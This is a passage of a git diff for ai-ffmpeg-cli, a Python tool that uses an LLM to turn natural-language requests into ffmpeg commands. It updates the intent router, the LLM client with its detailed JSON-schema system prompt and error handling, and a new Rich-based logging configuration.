+) -> CommandPlan:
+    """Route FfmpegIntent to CommandPlan with security validation.
+
+    Converts a parsed intent into an executable command plan, including
+    security validation, glob expansion, and command argument generation.
+
+    Args:
+        intent: Parsed user intent to route
+        allowed_dirs: List of allowed directories for file operations
+        output_dir: Output directory for generated files (optional)
+
+    Returns:
+        CommandPlan: Execution plan with validated commands
@@ -54,7 +199,7 @@ def route_intent(intent: FfmpegIntent, allowed_dirs: list[Path] | None = None) -
         derived_inputs.extend(globbed)

     # Validate all input paths for security
-    from .io_utils import is_safe_path
+    from .file_operations import is_safe_path

     validated_inputs = []
     for input_path in derived_inputs:
@@ -81,17 +226,54 @@ def route_intent(intent: FfmpegIntent, allowed_dirs: list[Path] | None = None) -
     entries: list[CommandEntry] = []

     for inp in derived_inputs:
-        output = _derive_output_name(inp, intent)
+        output = _derive_output_name(inp, intent, output_dir)
         args: list[str] = []

         if intent.action == Action.convert:
+            # Collect all filters to combine into a single -vf flag
+            all_filters = []
+
             if intent.scale:
-                args.extend(["-vf", f"scale={intent.scale}"])
+                # Validate and fix scale filter to ensure even dimensions
+                fixed_scale = _validate_and_fix_scale_filter(f"scale={intent.scale}")
+                if fixed_scale:
+                    all_filters.append(fixed_scale)
+
+            if intent.filters:
+                # Validate all filters in the filters list
+                validated_filters = _validate_and_fix_filter_chain(intent.filters)
+                all_filters.extend(validated_filters)
+
+            # Remove duplicate scale filters (keep the last one)
+            scale_filters = [f for f in all_filters if f.startswith("scale=")]
+            non_scale_filters = [f for f in all_filters if not f.startswith("scale=")]
+
+            # If there are multiple scale filters, keep only the last one
+            if len(scale_filters) > 1:
+                scale_filters = [scale_filters[-1]]
+
+            # Reconstruct the filter chain
+            final_filters = non_scale_filters + scale_filters
+
+            # Add single -vf flag with all filters combined
+            if final_filters:
+                filter_str = ",".join(final_filters)
+                args.extend(["-vf", filter_str])
+
             if intent.video_codec:
                 args.extend(["-c:v", intent.video_codec])
             if intent.audio_codec:
                 args.extend(["-c:a", intent.audio_codec])
         elif intent.action == Action.extract_audio:
+            # Extract audio with high quality settings
             args.extend(["-q:a", "0", "-map", "a"])
         elif intent.action == Action.remove_audio:
+            # Remove audio track
             args.extend(["-an"])
             if intent.video_codec:
                 args.extend(["-c:v", intent.video_codec])
         elif intent.action == Action.trim:
+            # Handle trimming with start/end/duration
             if intent.start:
                 args.extend(["-ss", intent.start])
             # If end is provided, prefer -to; otherwise use duration if present
@@ -100,7 +282,7 @@ def route_intent(intent: FfmpegIntent, allowed_dirs: list[Path] | None = None) -
             elif intent.duration is not None:
                 args.extend(["-t", str(intent.duration)])
         elif intent.action == Action.segment:
-            # simplified: use start/end if provided, else duration
+            # Simplified segmenting: use start/end if provided, else duration
             if intent.start:
                 args.extend(["-ss", intent.start])
             if intent.end:
@@ -108,18 +290,24 @@ def route_intent(intent: FfmpegIntent, allowed_dirs: list[Path] | None = None) -
             elif intent.duration is not None:
                 args.extend(["-t", str(intent.duration)])
         elif intent.action == Action.thumbnail:
+            # Extract single frame for thumbnail
             if intent.start:
                 args.extend(["-ss", intent.start])
             args.extend(["-vframes", "1"])
         elif intent.action == Action.frames:
+            # Extract frames with specified FPS
             if intent.fps:
                 args.extend(["-vf", f"fps={intent.fps}"])
         elif intent.action == Action.compress:
-            # defaults in command builder
+            # Apply compression settings with defaults
            if intent.crf is not None:
                 args.extend(["-crf", str(intent.crf)])
             if intent.video_codec:
                 args.extend(["-c:v", intent.video_codec])
             if intent.audio_codec:
                 args.extend(["-c:a", intent.audio_codec])
         elif intent.action == Action.overlay:
-            # include overlay input and optional xy; filter added in builder if not present
+            # Handle overlay operations with additional input
             if intent.overlay_path:
                 # When overlay_xy provided, include filter here to override builder default
                 if intent.overlay_xy:
@@ -133,11 +321,28 @@ def route_intent(intent: FfmpegIntent, allowed_dirs: list[Path] | None = None) -
                     )
                 )
                 continue
+        elif intent.action == Action.format_convert:
+            # Handle format conversion with specific codecs
+            if intent.format:
+                args.extend(["-f", intent.format])
+            if intent.video_codec:
+                args.extend(["-c:v", intent.video_codec])
+            if intent.audio_codec:
+                args.extend(["-c:a", intent.audio_codec])
+        elif intent.action == Action.extract_frames:
+            # Handle frame extraction with FPS
+            if intent.fps:
+                args.extend(["-vf", f"fps={intent.fps}"])
+            else:
+                # Default to 1 frame per 5 seconds
+                args.extend(["-vf", "fps=1/5"])
+            # Add frame_pts for better frame naming
+            args.extend(["-frame_pts", "1"])
         else:
             raise BuildError(
                 f"Unsupported action: {intent.action}. "
                 f"Supported actions are: convert, extract_audio, remove_audio, "
-                f"trim, segment, thumbnail, frames, compress, overlay. "
+                f"trim, segment, thumbnail, frames, compress, overlay, format_convert, extract_frames. "
                 f"Please rephrase your request using supported operations."
             )

@@ -148,6 +353,18 @@ def route_intent(intent: FfmpegIntent, allowed_dirs: list[Path] | None = None) -
 def _build_summary(intent: FfmpegIntent, entries: list[CommandEntry]) -> str:
+    """Build a human-readable summary of the command plan.
+
+    Creates a descriptive summary of what the command plan will do,
+    including action type, file count, and key parameters.
+
+    Args:
+        intent: The parsed intent
+        entries: List of command entries in the plan
+
+    Returns:
+        Human-readable summary string
+    """
     if intent.action == Action.convert:
         return f"Convert {len(entries)} file(s) to mp4 h264+aac with optional scale {intent.scale or '-'}"
     if intent.action == Action.extract_audio:
@@ -165,4 +382,12 @@ def _build_summary(intent: FfmpegIntent, entries: list[CommandEntry]) -> str:
         return f"Compress {len(entries)} file(s) with libx265 CRF {intent.crf or 28}"
     if intent.action == Action.frames:
         return f"Extract frames from {len(entries)} file(s) with fps {intent.fps or '1/5'}"
+    if intent.action == Action.format_convert:
+        format_info = f"format={intent.format}" if intent.format else "default format"
+        video_info = f"video={intent.video_codec}" if intent.video_codec else "default video"
+        audio_info = f"audio={intent.audio_codec}" if intent.audio_codec else "default audio"
+        return f"Convert {len(entries)} file(s) to {format_info} with {video_info} and {audio_info}"
+    if intent.action == Action.extract_frames:
+        fps_info = f"fps={intent.fps}" if intent.fps else "fps=1/5"
+        return f"Extract frames from {len(entries)} file(s) with {fps_info}"
     return f"Action {intent.action} on {len(entries)} file(s)"
@@ -1,3 +1,9 @@
|
||||
"""LLM client implementation for ai-ffmpeg-cli.
|
||||
|
||||
This module provides the interface for communicating with Large Language Models
|
||||
to parse natural language prompts into structured ffmpeg intents.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
@@ -5,31 +11,160 @@ from typing import Any
|
||||
|
||||
from pydantic import ValidationError
|
||||
|
||||
from .errors import ParseError
|
||||
from .nl_schema import FfmpegIntent
|
||||
from .security import create_secure_logger
|
||||
from .security import sanitize_error_message
|
||||
from .credential_security import create_secure_logger
|
||||
from .credential_security import sanitize_error_message
|
||||
from .custom_exceptions import ParseError
|
||||
from .intent_models import FfmpegIntent
|
||||
|
||||
# Create secure logger that masks sensitive information
|
||||
logger = create_secure_logger(__name__)
|
||||
|
||||
|
||||
# Comprehensive system prompt that instructs the LLM on how to parse natural language
|
||||
# into structured ffmpeg intents with specific schema requirements
|
||||
SYSTEM_PROMPT = (
|
||||
"You are an expert assistant that translates natural language into ffmpeg intents. "
|
||||
"Respond ONLY with JSON matching the FfmpegIntent schema. Fields: action, inputs, output, "
|
||||
"video_codec, audio_codec, filters, start, end, duration, scale, bitrate, crf, overlay_path, "
|
||||
"overlay_xy, fps, glob, extra_flags. Use defaults: convert uses libx264+aac; 720p->scale=1280:720, "
|
||||
"1080p->1920:1080; compression uses libx265 with crf=28. If unsupported, reply with "
|
||||
'{"error": "unsupported_action", "message": "..."}.'
|
||||
"You are an expert assistant that translates natural language into ffmpeg intents.\n"
|
||||
"Respond ONLY with JSON matching the FfmpegIntent schema.\n"
|
||||
"\n"
|
||||
"Schema fields (all optional unless noted):\n"
|
||||
" action (required): one of ['convert','trim','segment','overlay','thumbnail','extract_audio','compress','format_convert','extract_frames']\n"
|
||||
" inputs: array of absolute file paths from context.videos / context.audios / context.images\n"
|
||||
" output: null or string filename (must NOT equal any input path)\n"
|
||||
" video_codec: e.g. 'libx264','libx265','copy'\n"
|
||||
" audio_codec: e.g. 'aac','libopus','copy','none'\n"
|
||||
" filters: ffmpeg filter chain string, filters separated by commas\n"
|
||||
" start: start time (e.g. '00:00:05.000' or seconds number)\n"
|
||||
" end: end time (same format as start). If both start and duration present, ignore end.\n"
|
||||
" duration: seconds number or time string\n"
|
||||
" scale: WxH string (e.g. '1920:1080'). Used ONLY if caller intends a simple scale; otherwise prefer 'filters'.\n"
|
||||
" bitrate: target video bitrate like '4000k' (ignored if crf is set)\n"
|
||||
" crf: integer CRF value (0=lossless, 18-28 common). Prefer CRF when present.\n"
|
||||
" overlay_path: absolute image/video path (from context) for overlays if action requires\n"
|
||||
" overlay_xy: overlay position like 'x=10:y=20'\n"
|
||||
" fps: integer frames per second (e.g. 30)\n"
|
||||
" glob: boolean; when true, inputs may include a single shell-style glob from context.images\n"
|
||||
" extra_flags: array of additional ffmpeg CLI flags (strings)\n"
|
||||
"\n"
|
||||
"Context usage:\n"
|
||||
" • Use ONLY paths present in context.videos, context.audios, or context.images.\n"
|
||||
" • Never invent filenames. Never use placeholders like 'input.mp4'.\n"
|
||||
" • If the user mentions a file that is not in context, return an error JSON (see Errors).\n"
|
||||
"\n"
|
||||
"Defaults and best practices:\n"
|
||||
" • For 'convert' without explicit codecs: video_codec='libx264', audio_codec='aac'.\n"
|
||||
" • For 'compress': video_codec='libx265', crf=28, audio_codec='aac'.\n"
|
||||
" • For format conversion (e.g., to GIF, WebM, AVI): use 'convert' action with appropriate filters and codecs.\n"
|
||||
" - GIF: use 'convert' with filters='fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse'\n"
|
||||
" - WebM: use 'convert' with video_codec='libvpx-vp9', audio_codec='libopus'\n"
|
||||
" - AVI: use 'convert' with video_codec='libx264', audio_codec='mp3'\n"
|
||||
" • Use 'format_convert' only when the user explicitly asks for a specific container format with default codecs.\n"
|
||||
" • Always ensure even dimensions with H.264/H.265. Use scale expressions that guarantee even sizes,\n"
|
||||
" e.g. scale=trunc(iw*0.5/2)*2:trunc(ih*0.5/2)*2 or force_original_aspect_ratio=decrease followed by pad with even ow/oh.\n"
|
||||
" • Prefer CRF over bitrate unless user explicitly asks for a bitrate.\n"
|
||||
" • Add 'yuv420p' pixel format and '+faststart' for web/social compatibility:\n"
|
||||
" extra_flags should include ['-pix_fmt','yuv420p','-movflags','+faststart'] unless user forbids.\n"
|
||||
" • If audio is not mentioned and exists, transcode to AAC at a reasonable default (e.g. 128k); if user says 'no audio', set audio_codec='none'.\n"
|
||||
" • If fps is requested, include -r via fps field (integer).\n"
|
||||
" • If duration is requested (e.g., '5 second GIF'), use duration field (number or time string).\n"
|
||||
"\n"
|
||||
"Aspect ratio & resizing rules:\n"
|
||||
" • For target AR changes (e.g. Instagram Reels 9:16, 1080x1920):\n"
|
||||
" - If user says 'crop' or 'fill', use: scale=-2:1920:force_original_aspect_ratio=increase, then crop=1080:1920 centered.\n"
|
||||
" - If user says 'pad' or 'no crop', use: scale=1080:-2:force_original_aspect_ratio=decrease, then pad=1080:1920:(ow-iw)/2:(oh-ih)/2.\n"
|
||||
" - Ensure final width/height are even.\n"
|
||||
" • If user gives only AR (e.g. 'make 9:16') and no resolution, infer 1080x1920 for vertical or 1920x1080 for horizontal.\n"
|
||||
"\n"
|
||||
"Subtitles (burn-in):\n"
|
||||
" • Use the 'subtitles=' filter when the user requests visible/burned captions.\n"
|
||||
" • Styling (ASS force_style) goes inside the subtitles filter only. Example:\n"
|
||||
" subtitles=/abs/path.srt:force_style='Fontsize=36,Outline=2,Shadow=1,PrimaryColour=&HFFFFFF&,OutlineColour=&H000000&'\n"
|
||||
" • Combine filters with commas, e.g.: scale=1080:-2:force_original_aspect_ratio=decrease,pad=1080:1920:(ow-iw)/2:(oh-ih)/2,subtitles=/abs/path.srt\n"
|
||||
"\n"
|
||||
"Filter chain rules:\n"
|
||||
" • Filters must be comma-separated in a single chain string.\n"
|
||||
" • Options like force_original_aspect_ratio apply ONLY to the scale filter, not to crop/subtitles.\n"
|
||||
" • Do NOT place unrelated options after subtitles. Each filter has its own parameters.\n"
|
||||
"\n"
|
||||
"Output safety:\n"
|
||||
" • Never set output to any input path. If omitted, the system will auto-name.\n"
|
||||
" • If user requests a container that conflicts with codecs (e.g. .mp4 with vp9), keep the container as requested but select compatible defaults if unspecified.\n"
|
||||
"\n"
|
||||
"Multiple inputs:\n"
|
||||
" • For concat of files with identical codecs, set action='concat' and provide inputs; filters may be empty. Otherwise use concat demuxing guidance implied by the user request.\n"
|
||||
"\n"
|
||||
"Trimming:\n"
|
||||
" • Respect start/end/duration. If both end and duration are given, prefer duration.\n"
|
||||
" • When user specifies a time limit (e.g., '5 second', '10s', '30 seconds'), use the duration field.\n"
|
||||
" • Duration can be specified as a number (seconds) or time string (e.g., '00:00:05').\n"
|
||||
" • IMPORTANT: When user asks for a specific duration (e.g., '5 second GIF', '10 second video'),\n"
|
||||
" ALWAYS include the duration field in the response.\n"
|
||||
"\n"
|
||||
"Errors:\n"
|
||||
" • If the user asks for an action you cannot express, reply ONLY with:\n"
|
||||
' {"error":"unsupported_action","message":"<short reason>"}\n'
|
||||
" • If required files are not in context, reply ONLY with:\n"
|
||||
' {"error":"missing_input","message":"File not found in context: <name>"}\n'
|
||||
"\n"
|
||||
"Quoting & portability:\n"
|
||||
" • Do not include shell quoting (no surrounding quotes). Provide plain values; the caller will add shell quotes.\n"
|
||||
" • Use absolute paths exactly as given in context.\n"
|
||||
"\n"
|
||||
"Examples (illustrative only — always use real context paths):\n"
|
||||
" • Instagram Reel (crop/fill): action='convert', filters='scale=-2:1920:force_original_aspect_ratio=increase,crop=1080:1920'\n"
|
||||
" • Instagram Reel (pad): action='convert', filters='scale=1080:-2:force_original_aspect_ratio=decrease,pad=1080:1920:(ow-iw)/2:(oh-ih)/2'\n"
|
||||
" • Convert to GIF: action='convert', filters='fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse', video_codec='gif', audio_codec='none'\n"
|
||||
" • Convert to GIF with duration: action='convert', filters='fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse', video_codec='gif', audio_codec='none', duration=5\n"
|
||||
" • 5 second GIF: action='convert', filters='fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse', video_codec='gif', audio_codec='none', duration=5\n"
|
||||
" • 10 second video clip: action='convert', video_codec='libx264', audio_codec='aac', duration=10\n"
|
||||
" • Convert to WebM: action='convert', video_codec='libvpx-vp9', audio_codec='libopus'\n"
|
||||
" • Burn subtitles: add ',subtitles=/abs/path.srt' at the end of the chain.\n"
|
||||
"\n"
|
||||
"Final instruction:\n"
|
||||
" • Return ONLY the JSON object for FfmpegIntent (or the JSON error). No prose, no code fences."
|
||||
)
|
||||
|
||||
|
||||
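For reference, the reply contract this prompt describes can be exercised with plain JSON. The field names below are taken from the prompt's own "5 second GIF" example; the real FfmpegIntent schema may differ, so treat this as an illustrative sketch only.

```python
import json

# A reply shaped like the "5 second GIF" example in the system prompt above.
raw_reply = json.dumps(
    {
        "action": "convert",
        "filters": [
            "fps=10,scale=320:-1:flags=lanczos,split[s0][s1];"
            "[s0]palettegen[p];[s1][p]paletteuse"
        ],
        "video_codec": "gif",
        "audio_codec": "none",
        "duration": 5,
    }
)

# The client parses the raw text before schema validation.
data = json.loads(raw_reply)
assert data["action"] == "convert"
assert data["duration"] == 5
```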
class LLMProvider:
    """Abstract base class for LLM providers.

    Defines the interface that all LLM providers must implement
    for natural language to intent parsing.
    """

    def complete(self, system: str, user: str, timeout: int) -> str:  # pragma: no cover - interface
        """Complete a chat request with the LLM.

        Args:
            system: System prompt defining the task
            user: User message to process
            timeout: Request timeout in seconds

        Returns:
            Raw response from the LLM

        Raises:
            NotImplementedError: Must be implemented by subclasses
        """
        raise NotImplementedError


class OpenAIProvider(LLMProvider):
    """OpenAI API provider implementation.

    Handles communication with OpenAI's chat completion API,
    including error handling and response processing.
    """

    def __init__(self, api_key: str, model: str) -> None:
        """Initialize OpenAI provider with API key and model.

        Args:
            api_key: OpenAI API key for authentication
            model: Model name to use for completions

        Raises:
            Exception: When client initialization fails
        """
        from openai import OpenAI  # lazy import for testability

        # Never log the actual API key
@@ -45,7 +180,22 @@ class OpenAIProvider(LLMProvider):
            raise

    def complete(self, system: str, user: str, timeout: int) -> str:
        """Complete chat request with error handling and retries."""
        """Complete chat request with error handling and retries.

        Sends a chat completion request to OpenAI with comprehensive
        error handling for various failure scenarios.

        Args:
            system: System prompt defining the task
            user: User message to process
            timeout: Request timeout in seconds

        Returns:
            Raw response content from OpenAI

        Raises:
            ParseError: When the request fails with specific error details
        """
        try:
            logger.debug(f"Making OpenAI API request with model: {self.model}, timeout: {timeout}s")

@@ -55,8 +205,7 @@ class OpenAIProvider(LLMProvider):
                    {"role": "system", "content": system},
                    {"role": "user", "content": user},
                ],
                temperature=0,
                response_format={"type": "json_object"},
                response_format={"type": "json_object"},  # Ensure JSON response
                timeout=timeout,
            )

@@ -116,7 +265,18 @@ class OpenAIProvider(LLMProvider):


class LLMClient:
    """High-level LLM client for parsing natural language into ffmpeg intents.

    Provides a unified interface for natural language processing with
    retry logic, error handling, and response validation.
    """

    def __init__(self, provider: LLMProvider) -> None:
        """Initialize LLM client with a provider.

        Args:
            provider: LLM provider instance to use for completions
        """
        self.provider = provider

    def parse(
@@ -124,19 +284,24 @@ class LLMClient:
    ) -> FfmpegIntent:
        """Parse natural language prompt into FfmpegIntent with retry logic.

        Processes a natural language prompt through the LLM to generate
        a structured ffmpeg intent. Includes input sanitization, prompt
        enhancement, and retry logic for failed parsing attempts.

        Args:
            nl_prompt: Natural language prompt from user
            context: File context information
            timeout: Request timeout in seconds
            context: File context information containing available files
            timeout: Request timeout in seconds (defaults to 60)

        Returns:
            FfmpegIntent: Parsed intent object
            FfmpegIntent: Parsed and validated intent object

        Raises:
            ParseError: If parsing fails after retry attempts
            ParseError: If parsing fails after retry attempts or validation errors
        """
        # Sanitize user input first
        from .io_utils import sanitize_user_input
        # Sanitize user input first to prevent injection attacks
        from .file_operations import sanitize_user_input
        from .prompt_enhancer import enhance_user_prompt

        sanitized_prompt = sanitize_user_input(nl_prompt)

@@ -145,17 +310,47 @@ class LLMClient:
                "Empty or invalid prompt provided. Please provide a clear description of what you want to do."
            )

        user_payload = json.dumps({"prompt": sanitized_prompt, "context": context})
        # Enhance the prompt for better LLM understanding using context
        enhanced_prompt = enhance_user_prompt(sanitized_prompt, context)

        # Log the enhancement for debugging
        if enhanced_prompt != sanitized_prompt:
            logger.debug(f"Enhanced prompt: '{sanitized_prompt}' -> '{enhanced_prompt}'")

        # Prepare user payload with prompt and context
        user_payload = json.dumps({"prompt": enhanced_prompt, "context": context})
        effective_timeout = 60 if timeout is None else timeout

        logger.debug(f"Parsing prompt with timeout: {effective_timeout}s")

        # First attempt
        # First attempt at parsing
        try:
            raw = self.provider.complete(SYSTEM_PROMPT, user_payload, timeout=effective_timeout)
            logger.debug(f"Received raw response: {len(raw)} chars")

            data = json.loads(raw)

            # Check if the response is an error JSON from the AI
            if isinstance(data, dict) and "error" in data:
                error_type = data.get("error", "unknown_error")
                error_message = data.get("message", "Unknown error")

                if error_type == "missing_input":
                    raise ParseError(
                        f"Input file not found: {error_message}. "
                        "Please ensure the file exists in the current directory and try again."
                    )
                elif error_type == "unsupported_action":
                    raise ParseError(
                        f"Unsupported operation: {error_message}. "
                        "Please check the supported actions and try a different approach."
                    )
                else:
                    raise ParseError(
                        f"AI model error: {error_message}. "
                        "Please try rephrasing your request or check if the operation is supported."
                    )

            intent = FfmpegIntent.model_validate(data)
            logger.debug(f"Successfully parsed intent: {intent.action}")
            return intent
@@ -179,6 +374,28 @@ class LLMClient:
            )

            data2 = json.loads(raw2)

            # Check if the retry response is an error JSON from the AI
            if isinstance(data2, dict) and "error" in data2:
                error_type = data2.get("error", "unknown_error")
                error_message = data2.get("message", "Unknown error")

                if error_type == "missing_input":
                    raise ParseError(
                        f"Input file not found: {error_message}. "
                        "Please ensure the file exists in the current directory and try again."
                    )
                elif error_type == "unsupported_action":
                    raise ParseError(
                        f"Unsupported operation: {error_message}. "
                        "Please check the supported actions and try a different approach."
                    )
                else:
                    raise ParseError(
                        f"AI model error: {error_message}. "
                        "Please try rephrasing your request or check if the operation is supported."
                    )

            intent2 = FfmpegIntent.model_validate(data2)
            logger.debug(f"Successfully parsed intent on retry: {intent2.action}")
            return intent2
@@ -213,3 +430,29 @@ class LLMClient:
                f"Network error during LLM request: {io_err}. "
                "Please check your internet connection and try again."
            ) from io_err

    def _fix_common_issues(self, response: str) -> str:
        """Fix common issues in LLM responses before parsing.

        Applies regex-based fixes to common JSON formatting issues
        that LLMs sometimes produce.

        Args:
            response: Raw JSON response from LLM

        Returns:
            str: Fixed JSON response with corrected formatting
        """
        import re

        # Fix null values for array fields that should be empty arrays
        response = re.sub(r'"filters":\s*null', '"filters": []', response)
        response = re.sub(r'"extra_flags":\s*null', '"extra_flags": []', response)
        response = re.sub(r'"inputs":\s*null', '"inputs": []', response)

        # Fix missing array brackets for single values
        # Match patterns like "filters": "value" and convert to "filters": ["value"]
        response = re.sub(r'"filters":\s*"([^"]+)"', r'"filters": ["\1"]', response)
        response = re.sub(r'"extra_flags":\s*"([^"]+)"', r'"extra_flags": ["\1"]', response)

        return response
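The substitutions in `_fix_common_issues` can be tried in isolation. This standalone sketch repeats the same regexes outside the class so their effect on a malformed reply is easy to see.

```python
import re


def fix_common_issues(response: str) -> str:
    # Same regex fixes as _fix_common_issues above, as a free function.
    response = re.sub(r'"filters":\s*null', '"filters": []', response)
    response = re.sub(r'"extra_flags":\s*null', '"extra_flags": []', response)
    response = re.sub(r'"inputs":\s*null', '"inputs": []', response)
    # Wrap bare string values in an array for list-typed fields.
    response = re.sub(r'"filters":\s*"([^"]+)"', r'"filters": ["\1"]', response)
    response = re.sub(r'"extra_flags":\s*"([^"]+)"', r'"extra_flags": ["\1"]', response)
    return response


broken = '{"action": "convert", "filters": "scale=1280:-2", "extra_flags": null}'
print(fix_common_issues(broken))
# → {"action": "convert", "filters": ["scale=1280:-2"], "extra_flags": []}
```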
31
src/ai_ffmpeg_cli/logging_config/__init__.py
Normal file
@@ -0,0 +1,31 @@
"""Rich-based logging configuration for ai-ffmpeg-cli.

This module provides a comprehensive logging setup using Rich for beautiful console output
and flexible file logging for production environments.
"""

from .config import JsonFormatter
from .config import get_logger
from .config import setup_logging
from .context import LogContext
from .context import bind_context
from .context import clear_context
from .context import get_context
from .context import request_id
from .context import tenant_id
from .context import user_id

__all__ = [
    "setup_logging",
    "get_logger",
    "JsonFormatter",
    "bind_context",
    "clear_context",
    "get_context",
    "LogContext",
    "request_id",
    "user_id",
    "tenant_id",
]

__version__ = "0.2.3"
281
src/ai_ffmpeg_cli/logging_config/config.py
Normal file
@@ -0,0 +1,281 @@
"""Rich-based logging configuration for ai-ffmpeg-cli."""

import json
import logging
import logging.handlers
import os
import sys
from pathlib import Path
from typing import Any

from rich.console import Console
from rich.logging import RichHandler
from rich.theme import Theme
from rich.traceback import install as install_rich_traceback

from .context import get_context

# Create a custom theme for better visual consistency
custom_theme = Theme(
    {
        "info": "cyan",
        "warning": "yellow",
        "error": "red",
        "critical": "red bold",
        "debug": "dim",
        "success": "green",
        "progress": "blue",
    }
)

# Initialize console with custom theme
console = Console(theme=custom_theme)


def setup_logging(
    level: str | int | None = None,
    json_output: bool = False,
    log_file: str | Path | None = None,
    show_locals: bool = True,
    console_instance: Console | None = None,
) -> None:
    """Setup Rich-based logging configuration.

    Args:
        level: Logging level (default: INFO, or LOG_LEVEL env var)
        json_output: Use JSON format for file logs (default: False)
        log_file: Path to log file (default: None)
        show_locals: Show local variables in tracebacks (default: True)
        console_instance: Rich console instance (default: creates new one)

    This function is idempotent - calling it multiple times won't duplicate handlers.
    """
    # Get log level from env var or use default
    if level is None:
        level = os.getenv("LOG_LEVEL", "INFO")

    # Convert string level to int if needed
    if isinstance(level, str):
        level = getattr(logging, level.upper(), logging.INFO)

    # Install Rich traceback handler
    install_rich_traceback(show_locals=show_locals)

    # Use provided console or create new one
    rich_console = console_instance or console

    # Get root logger
    root_logger = logging.getLogger()

    # Clear existing handlers to ensure idempotency
    root_logger.handlers.clear()

    # Create Rich console handler with enhanced formatting
    rich_handler = RichHandler(
        console=rich_console,
        show_time=True,
        show_path=False,  # Don't show file paths and line numbers
        markup=True,
        rich_tracebacks=True,
        tracebacks_show_locals=show_locals,
        show_level=True,
        level=level,
        log_time_format="[%X]",
    )
    rich_handler.setLevel(level)

    # Set root logger level
    root_logger.setLevel(level)

    # Create formatter for Rich handler
    rich_formatter = logging.Formatter(
        fmt="%(message)s",
        datefmt="[%X]",
    )
    rich_handler.setFormatter(rich_formatter)

    # Add Rich handler to root logger
    root_logger.addHandler(rich_handler)

    # Setup file logging if log_file is specified
    if log_file:
        log_path = Path(log_file)
        log_path.parent.mkdir(parents=True, exist_ok=True)

        if json_output:
            # JSON file handler
            file_handler = logging.handlers.RotatingFileHandler(
                log_path,
                maxBytes=10 * 1024 * 1024,  # 10MB
                backupCount=5,
                encoding="utf-8",
            )
            file_handler.setFormatter(JsonFormatter())
        else:
            # Plain text file handler
            file_handler = logging.handlers.RotatingFileHandler(
                log_path,
                maxBytes=10 * 1024 * 1024,  # 10MB
                backupCount=5,
                encoding="utf-8",
            )
            file_handler.setFormatter(
                logging.Formatter(
                    fmt="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
                    datefmt="%Y-%m-%d %H:%M:%S",
                )
            )

        file_handler.setLevel(level)
        root_logger.addHandler(file_handler)

    # Capture warnings in logs
    logging.captureWarnings(True)

    # Silence noisy libraries
    _silence_noisy_libraries()

    # Log setup completion with enhanced formatting
    logger = logging.getLogger(__name__)
    logger.info(
        "ai-ffmpeg-cli logging initialized",
        extra={
            "level": logging.getLevelName(level),
            "log_file": str(log_file) if log_file else "console only",
            "rich_tracebacks": True,
            "show_locals": show_locals,
        },
    )


def _silence_noisy_libraries() -> None:
    """Silence noisy third-party libraries to WARNING level."""
    noisy_libraries = [
        "urllib3",
        "botocore",
        "boto3",
        "requests",
        "httpx",
        "aiohttp",
        "asyncio",
        "charset_normalizer",
        "certifi",
    ]

    for lib in noisy_libraries:
        logging.getLogger(lib).setLevel(logging.WARNING)


class JsonFormatter(logging.Formatter):
    """JSON formatter for structured logging."""

    def format(self, record: logging.LogRecord) -> str:
        """Format log record as JSON."""
        # Get context data
        context_data = get_context()

        # Prepare log entry
        log_entry = {
            "timestamp": self.formatTime(record),
            "level": record.levelname,
            "logger": record.name,
            "message": record.getMessage(),
            "module": record.module,
            "function": record.funcName,
            "line": record.lineno,
        }

        # Add context data if available
        if context_data:
            log_entry["context"] = context_data

        # Add exception info if present
        if record.exc_info and record.exc_info != (None, None, None):
            log_entry["exception"] = self.formatException(record.exc_info)

        # Add extra fields
        for key, value in record.__dict__.items():
            if key not in log_entry and not key.startswith("_"):
                log_entry[key] = value

        return json.dumps(log_entry, ensure_ascii=False, default=str)


def get_logger(name: str) -> logging.Logger:
    """Get a logger with the given name.

    Args:
        name: Logger name (usually __name__)

    Returns:
        Configured logger instance
    """
    return logging.getLogger(name)


def log_startup_info() -> None:
    """Log startup information with Rich formatting."""
    logger = get_logger(__name__)

    # Log system information
    logger.info(
        "Starting ai-ffmpeg-cli",
        extra={
            "python_version": f"{sys.version_info.major}.{sys.version_info.minor}.{sys.version_info.micro}",
            "platform": sys.platform,
            "working_directory": str(Path.cwd()),
        },
    )

    # Log configuration status
    api_key_configured = bool(os.getenv("OPENAI_API_KEY"))
    logger.info(
        "Configuration status",
        extra={
            "api_key_configured": api_key_configured,
            "log_level": os.getenv("LOG_LEVEL", "INFO"),
            "model": os.getenv("AICLIP_MODEL", "gpt-5"),
        },
    )


def log_operation_start(operation: str, **kwargs: Any) -> None:
    """Log the start of an operation with Rich formatting.

    Args:
        operation: Name of the operation
        **kwargs: Additional context information
    """
    logger = get_logger(__name__)
    logger.info(f"Starting operation: {operation}", extra=kwargs)


def log_operation_success(operation: str, **kwargs: Any) -> None:
    """Log successful completion of an operation with Rich formatting.

    Args:
        operation: Name of the operation
        **kwargs: Additional context information
    """
    logger = get_logger(__name__)
    logger.info(f"Operation completed: {operation}", extra=kwargs)


def log_operation_error(operation: str, error: Exception, **kwargs: Any) -> None:
    """Log an operation error with Rich formatting.

    Args:
        operation: Name of the operation
        error: The error that occurred
        **kwargs: Additional context information
    """
    logger = get_logger(__name__)
    logger.error(
        f"Operation failed: {operation}",
        extra={
            "error_type": type(error).__name__,
            "error_message": str(error),
            **kwargs,
        },
        exc_info=True,
    )
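The idempotency note in `setup_logging` (clear existing handlers before re-adding) can be shown with a minimal stdlib-only sketch. `setup` here is a hypothetical simplified stand-in for illustration, not the project's function.

```python
import logging


def setup(level: int = logging.INFO) -> None:
    # Minimal idempotent setup: clear handlers before re-adding,
    # mirroring the root_logger.handlers.clear() call above.
    root = logging.getLogger()
    root.handlers.clear()
    handler = logging.StreamHandler()
    handler.setFormatter(logging.Formatter("%(levelname)s %(name)s: %(message)s"))
    root.addHandler(handler)
    root.setLevel(level)


setup()
setup()  # calling twice must not duplicate handlers
assert len(logging.getLogger().handlers) == 1
```

Without the `handlers.clear()` step, each call would stack another handler on the root logger and every message would be emitted once per call.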
155
src/ai_ffmpeg_cli/logging_config/context.py
Normal file
@@ -0,0 +1,155 @@
"""Contextual logging support using contextvars."""

import contextvars
from typing import Any

# Context variables for logging
